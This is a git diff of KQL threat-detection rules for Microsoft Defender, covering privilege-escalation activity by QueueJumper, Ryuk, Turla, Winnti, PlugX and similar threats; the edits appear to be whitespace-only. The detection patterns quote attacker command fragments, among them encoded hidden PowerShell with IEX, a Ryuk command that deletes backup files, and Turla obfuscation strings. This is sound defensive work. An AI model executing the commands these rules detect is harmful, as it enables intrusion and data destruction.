diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2023_21554_queuejumper_exploitation.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2023_21554_queuejumper_exploitation.kql
index e4dfdf8c..8dc33cc3 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2023_21554_queuejumper_exploitation.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2023_21554_queuejumper_exploitation.kql
@@ -1,10 +1,10 @@
-// Title: Potential CVE-2023-21554 QueueJumper Exploitation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-04-12
-// Level: high
-// Description: Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, cve.2023-21554, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential CVE-2023-21554 QueueJumper Exploitation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-12
+// Level: high
+// Description: Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, cve.2023-21554, detection.emerging-threats
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\Windows\\System32\\mqsvc.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql
index fb0d5662..faeeae87 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql
@@ -1,13 +1,13 @@
-// Title: Potential CVE-2024-35250 Exploitation Activity
-// Author: @eyezuhk Isaac Fernandes
-// Date: 2025-02-19
-// Level: medium
-// Description: Detects potentially suspicious loading of "ksproxy.ax", which may indicate an attempt to exploit CVE-2024-35250.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.t1068, cve.2024-35250, detection.emerging-threats
-// False Positives:
-// - Legitimate applications that use Windows Stream Interface APIs.
-// - Media applications that use DirectShow filters.
-
-DeviceImageLoadEvents
+// Title: Potential CVE-2024-35250 Exploitation Activity
+// Author: @eyezuhk Isaac Fernandes
+// Date: 2025-02-19
+// Level: medium
+// Description: Detects potentially suspicious loading of "ksproxy.ax", which may indicate an attempt to exploit CVE-2024-35250.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, cve.2024-35250, detection.emerging-threats
+// False Positives:
+// - Legitimate applications that use Windows Stream Interface APIs.
+// - Media applications that use DirectShow filters.
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\ksproxy.ax" and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\"))) and (not((InitiatingProcessFolderPath endswith "\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Discord\\app-" and InitiatingProcessFolderPath contains "\\Discord.exe") or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Mozilla Firefox\\firefox.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Opera\\opera.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Zoom\\bin\\Zoom.exe")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql
index 195a4faf..b2da971c 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql
@@ -1,12 +1,12 @@
-// Title: Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309)
-// Author: Nisarg Suthar
-// Date: 2025-08-01
-// Level: high
-// Description: Detects suspicious child processes created by CrushFTP. It could be an indication of exploitation of a RCE vulnerability such as CVE-2025-54309.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.initial-access, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1068, attack.t1190, cve.2025-54309, detection.emerging-threats
-// False Positives:
-// - Legitimate administrative command execution
-
-DeviceProcessEvents
+// Title: Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309)
+// Author: Nisarg Suthar
+// Date: 2025-08-01
+// Level: high
+// Description: Detects suspicious child processes created by CrushFTP. It could be an indication of exploitation of a RCE vulnerability such as CVE-2025-54309.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.initial-access, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1068, attack.t1190, cve.2025-54309, detection.emerging-threats
+// False Positives:
+// - Legitimate administrative command execution
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\crushftp.exe" and (((ProcessCommandLine contains "/c powershell" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "net.exe" or ProcessCommandLine contains "net1.exe") and FolderPath endswith "\\cmd.exe") or (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or ((ProcessCommandLine contains "IEX" and ProcessCommandLine contains "enc" and ProcessCommandLine contains "Hidden" and ProcessCommandLine contains "bypass") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql
index da562f22..768174f9 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql
@@ -1,12 +1,12 @@
-// Title: Potential KamiKakaBot Activity - Winlogon Shell Persistence
-// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior
-// Date: 2024-03-22
-// Level: high
-// Description: Detects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Potential KamiKakaBot Activity - Winlogon Shell Persistence
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior
+// Date: 2024-03-22
+// Level: high
+// Description: Detects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where (RegistryValueData contains "-nop -w h" and RegistryValueData contains "$env" and RegistryValueData contains "explorer.exe" and RegistryValueData contains "Start-Process") and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql
index 793e6168..4e73f2f9 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql
@@ -1,13 +1,13 @@
-// Title: Potential Pikabot Hollowing Activity
-// Author: Andreas Braathen (mnemonic.io)
-// Date: 2023-10-27
-// Level: high
-// Description: Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries.
-// The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.012, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential Pikabot Hollowing Activity
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-10-27
+// Level: high
+// Description: Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries.
+// The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.012, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\SearchFilterHost.exe" or FolderPath endswith "\\SearchProtocolHost.exe" or FolderPath endswith "\\sndvol.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wwahost.exe") and InitiatingProcessFolderPath endswith "\\rundll32.exe") and (not((FolderPath endswith "\\sndvol.exe" and InitiatingProcessCommandLine contains "mmsys.cpl")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_plugx_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_plugx_activity.kql
index ae3bceec..ffe1c480 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/potential_plugx_activity.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_plugx_activity.kql
@@ -1,10 +1,10 @@
-// Title: Potential PlugX Activity
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017-06-12
-// Level: high
-// Description: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.s0013, attack.defense-evasion, attack.t1574.001, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential PlugX Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-06-12
+// Level: high
+// Description: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.s0013, attack.defense-evasion, attack.t1574.001, detection.emerging-threats
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\CamMute.exe" and (not((FolderPath contains "\\Lenovo\\Communication Utility\\" or FolderPath contains "\\Lenovo\\Communications Utility\\")))) or (FolderPath endswith "\\chrome_frame_helper.exe" and (not(FolderPath contains "\\Google\\Chrome\\application\\"))) or (FolderPath endswith "\\dvcemumanager.exe" and (not(FolderPath contains "\\Microsoft Device Emulator\\"))) or (FolderPath endswith "\\Gadget.exe" and (not(FolderPath contains "\\Windows Media Player\\"))) or (FolderPath endswith "\\hcc.exe" and (not(FolderPath contains "\\HTML Help Workshop\\"))) or (FolderPath endswith "\\hkcmd.exe" and (not((FolderPath contains "\\System32\\" or FolderPath contains "\\SysNative\\" or FolderPath contains "\\SysWow64\\")))) or (FolderPath endswith "\\Mc.exe" and (not((FolderPath contains "\\Microsoft Visual Studio" or FolderPath contains "\\Microsoft SDK" or FolderPath contains "\\Windows Kit")))) or (FolderPath endswith "\\MsMpEng.exe" and (not((FolderPath contains "\\Microsoft Security Client\\" or FolderPath contains "\\Windows Defender\\" or FolderPath contains "\\AntiMalware\\")))) or (FolderPath endswith "\\msseces.exe" and (not((FolderPath contains "\\Microsoft Security Center\\" or FolderPath contains "\\Microsoft Security Client\\" or FolderPath contains "\\Microsoft Security Essentials\\")))) or (FolderPath endswith "\\OInfoP11.exe" and (not(FolderPath contains "\\Common Files\\Microsoft Shared\\"))) or (FolderPath endswith "\\OleView.exe" and (not((FolderPath contains "\\Microsoft Visual Studio" or FolderPath contains "\\Microsoft SDK" or FolderPath contains "\\Windows Kit" or FolderPath contains "\\Windows Resource Kit\\")))) or (FolderPath endswith "\\rc.exe" and (not((FolderPath contains "\\Microsoft Visual Studio" or FolderPath contains "\\Microsoft SDK" or FolderPath contains "\\Windows Kit" or FolderPath contains "\\Windows Resource Kit\\" or FolderPath contains "\\Microsoft.NET\\"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_ryuk_ransomware_activity.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_ryuk_ransomware_activity.kql
index 71a90158..35534de5 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/potential_ryuk_ransomware_activity.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_ryuk_ransomware_activity.kql
@@ -1,12 +1,12 @@
-// Title: Potential Ryuk Ransomware Activity
-// Author: Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019-12-16
-// Level: high
-// Description: Detects Ryuk ransomware activity
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential Ryuk Ransomware Activity
+// Author: Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-12-16
+// Level: high
+// Description: Detects Ryuk ransomware activity
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "del /s /f /q c:\\" and ProcessCommandLine contains "*.bac" and ProcessCommandLine contains "*.bak" and ProcessCommandLine contains "*.bkf") or ((ProcessCommandLine contains "samss" or ProcessCommandLine contains "audioendpointbuilder" or ProcessCommandLine contains "unistoresvc_" or ProcessCommandLine contains "AcrSch2Svc") and (ProcessCommandLine contains " stop " and ProcessCommandLine contains " /y") and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" and ProcessCommandLine contains "C:\\users\\Public\\")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_systemnightmare_exploitation_attempt.kql b/KQL/rules-emerging-threats/Privilege Escalation/potential_systemnightmare_exploitation_attempt.kql
index d3d57bb1..34e1b597 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/potential_systemnightmare_exploitation_attempt.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/potential_systemnightmare_exploitation_attempt.kql
@@ -1,10 +1,10 @@
-// Title: Potential SystemNightmare Exploitation Attempt
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-08-11
-// Level: critical
-// Description: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.t1068, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential SystemNightmare Exploitation Attempt
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-11
+// Level: critical
+// Description: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, detection.emerging-threats
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "printnightmare.gentilkiwi.com" or ProcessCommandLine contains " /user:gentilguest " or ProcessCommandLine contains "Kiwi Legit Printer"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql b/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql
index 147394fd..52444c1c 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql
@@ -1,14 +1,14 @@
-// Title: Serpent Backdoor Payload Execution Via Scheduled Task
-// Author: @kostastsale
-// Date: 2022-03-21
-// Level: high
-// Description: Detects post exploitation execution technique of the Serpent backdoor.
-// According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method.
-// It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.006, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Serpent Backdoor Payload Execution Via Scheduled Task
+// Author: @kostastsale
+// Date: 2022-03-21
+// Level: high
+// Description: Detects post exploitation execution technique of the Serpent backdoor.
+// According to Proofpoint, one of the commands that the backdoor ran was via creating a temporary scheduled task using an unusual method.
+// It creates a fictitious windows event and a trigger in which once the event is created, it executes the payload.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.006, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "[System/EventID=" and ProcessCommandLine contains "/create" and ProcessCommandLine contains "/delete" and ProcessCommandLine contains "/ec" and ProcessCommandLine contains "/so" and ProcessCommandLine contains "/tn run") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/small_sieve_malware_commandline_indicator.kql b/KQL/rules-emerging-threats/Privilege Escalation/small_sieve_malware_commandline_indicator.kql
index 35978f87..8c269693 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/small_sieve_malware_commandline_indicator.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/small_sieve_malware_commandline_indicator.kql
@@ -1,12 +1,12 @@
-// Title: Small Sieve Malware CommandLine Indicator
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-19
-// Level: high
-// Description: Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Small Sieve Malware CommandLine Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-19
+// Level: high
+// Description: Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1574.001, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine endswith ".exe Platypus"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/suspicious_sysmon_as_execution_parent.kql b/KQL/rules-emerging-threats/Privilege Escalation/suspicious_sysmon_as_execution_parent.kql
index 9b20865f..d9d5c139 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/suspicious_sysmon_as_execution_parent.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/suspicious_sysmon_as_execution_parent.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Sysmon as Execution Parent
-// Author: Florian Roth (Nextron Systems), Tim Shelton (fp werfault)
-// Date: 2022-11-10
-// Level: high
-// Description: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.t1068, cve.2022-41120, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Suspicious Sysmon as Execution Parent
+// Author: Florian Roth (Nextron Systems), Tim Shelton (fp werfault)
+// Date: 2022-11-10
+// Level: high
+// Description: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, cve.2022-41120, detection.emerging-threats
+
+DeviceProcessEvents
 | where (InitiatingProcessFolderPath endswith "\\Sysmon.exe" or InitiatingProcessFolderPath endswith "\\Sysmon64.exe") and (not(((FolderPath contains ":\\Windows\\Sysmon.exe" or FolderPath contains ":\\Windows\\Sysmon64.exe" or FolderPath contains ":\\Windows\\System32\\conhost.exe" or FolderPath contains ":\\Windows\\System32\\WerFault.exe" or FolderPath contains ":\\Windows\\System32\\WerFaultSecure.exe" or FolderPath contains ":\\Windows\\System32\\wevtutil.exe" or FolderPath contains ":\\Windows\\SysWOW64\\wevtutil.exe") or isnull(FolderPath) or (FolderPath contains "\\AppData\\Local\\Temp\\" and (FolderPath endswith "\\Sysmon.exe" or FolderPath endswith "\\Sysmon64.exe") and FolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/suspicious_vbscript_un2452_pattern.kql b/KQL/rules-emerging-threats/Privilege Escalation/suspicious_vbscript_un2452_pattern.kql
index 1d44572a..b0d8a9b3 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/suspicious_vbscript_un2452_pattern.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/suspicious_vbscript_un2452_pattern.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious VBScript UN2452 Pattern
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-03-05
-// Level: high
-// Description: Detects suspicious inline VBScript keywords as used by UNC2452
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Suspicious VBScript UN2452 Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-05
+// Level: high
+// Description: Detects suspicious inline VBScript keywords as used by UNC2452
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, detection.emerging-threats
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "Execute" and ProcessCommandLine contains "CreateObject" and ProcessCommandLine contains "RegRead" and ProcessCommandLine contains "window.close" and ProcessCommandLine contains "\\Microsoft\\Windows\\CurrentVersion") and (not(ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/taidoor_rat_dll_load.kql b/KQL/rules-emerging-threats/Privilege Escalation/taidoor_rat_dll_load.kql
index e342028a..161f5906 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/taidoor_rat_dll_load.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/taidoor_rat_dll_load.kql
@@ -1,10 +1,10 @@
-// Title: TAIDOOR RAT DLL Load
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020-07-30
-// Level: high
-// Description: Detects specific process characteristics of Chinese TAIDOOR RAT malware load
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.execution, attack.t1055.001, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: TAIDOOR RAT DLL Load
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-30
+// Level: high
+// Description: Detects specific process characteristics of Chinese TAIDOOR RAT malware load
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.execution, attack.t1055.001, detection.emerging-threats
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "dll,MyStart" or ProcessCommandLine contains "dll MyStart") or (ProcessCommandLine endswith " MyStart" and ProcessCommandLine contains "rundll32.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/turla_group_commands_may_2020.kql b/KQL/rules-emerging-threats/Privilege Escalation/turla_group_commands_may_2020.kql
index 19ca8603..69c36a2b 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/turla_group_commands_may_2020.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/turla_group_commands_may_2020.kql
@@ -1,10 +1,10 @@
-// Title: Turla Group Commands May 2020
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020-05-26
-// Level: critical
-// Description: Detects commands used by Turla group as reported by ESET in May 2020
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.g0010, attack.execution, attack.t1059.001, attack.t1053.005, attack.t1027, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Turla Group Commands May 2020
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-05-26
+// Level: critical
+// Description: Detects commands used by Turla group as reported by ESET in May 2020
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.g0010, attack.execution, attack.t1059.001, attack.t1053.005, attack.t1027, detection.emerging-threats
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "tracert -h 10 yahoo.com" or ProcessCommandLine contains ".WSqmCons))|iex;" or ProcessCommandLine contains "Fr`omBa`se6`4Str`ing") or (ProcessCommandLine contains "@aol.co.uk" and ProcessCommandLine matches regex "net\\s+use\\s+https://docs.live.net")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/winnti_malware_hk_university_campaign.kql b/KQL/rules-emerging-threats/Privilege Escalation/winnti_malware_hk_university_campaign.kql
index 996d9685..118003cd 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/winnti_malware_hk_university_campaign.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/winnti_malware_hk_university_campaign.kql
@@ -1,12 +1,12 @@
-// Title: Winnti Malware HK University Campaign
-// Author: Florian Roth (Nextron Systems), Markus Neis
-// Date: 2020-02-01
-// Level: critical
-// Description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0044, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Winnti Malware HK University Campaign
+// Author: Florian Roth (Nextron Systems), Markus Neis
+// Date: 2020-02-01
+// Level: critical
+// Description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0044, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (FolderPath startswith "C:\\ProgramData\\DRM" and (InitiatingProcessFolderPath contains "C:\\Windows\\Temp" or InitiatingProcessFolderPath contains "\\hpqhvind.exe")) or (FolderPath endswith "\\wmplayer.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\DRM") or (FolderPath endswith "\\wmplayer.exe" and InitiatingProcessFolderPath endswith "\\Test.exe") or FolderPath =~ "C:\\ProgramData\\DRM\\CLR\\CLR.exe" or (FolderPath endswith "\\SearchFilterHost.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\DRM\\Windows")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Privilege Escalation/winnti_pipemon_characteristics.kql b/KQL/rules-emerging-threats/Privilege Escalation/winnti_pipemon_characteristics.kql
index 2f7b9965..51e20957 100644
--- a/KQL/rules-emerging-threats/Privilege Escalation/winnti_pipemon_characteristics.kql
+++ b/KQL/rules-emerging-threats/Privilege Escalation/winnti_pipemon_characteristics.kql
@@ -1,12 +1,12 @@
-// Title: Winnti Pipemon Characteristics
-// Author: Florian Roth (Nextron Systems), oscd.community
-// Date: 2020-07-30
-// Level: critical
-// Description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0044, detection.emerging-threats
-// False Positives:
-// - Legitimate setups that use similar flags
-
-DeviceProcessEvents
+// Title: Winnti Pipemon Characteristics
+// Author: Florian Roth (Nextron Systems), oscd.community
+// Date: 2020-07-30
+// Level: critical
+// Description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0044, detection.emerging-threats
+// False Positives:
+// - Legitimate setups that use similar flags
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "setup0.exe -p" or (ProcessCommandLine contains "setup.exe" and (ProcessCommandLine endswith "-x:0" or ProcessCommandLine endswith "-x:1" or ProcessCommandLine endswith "-x:2"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Resource Development/conti_volume_shadow_listing.kql b/KQL/rules-emerging-threats/Resource Development/conti_volume_shadow_listing.kql
index 213e1824..98a53527 100644
--- a/KQL/rules-emerging-threats/Resource Development/conti_volume_shadow_listing.kql
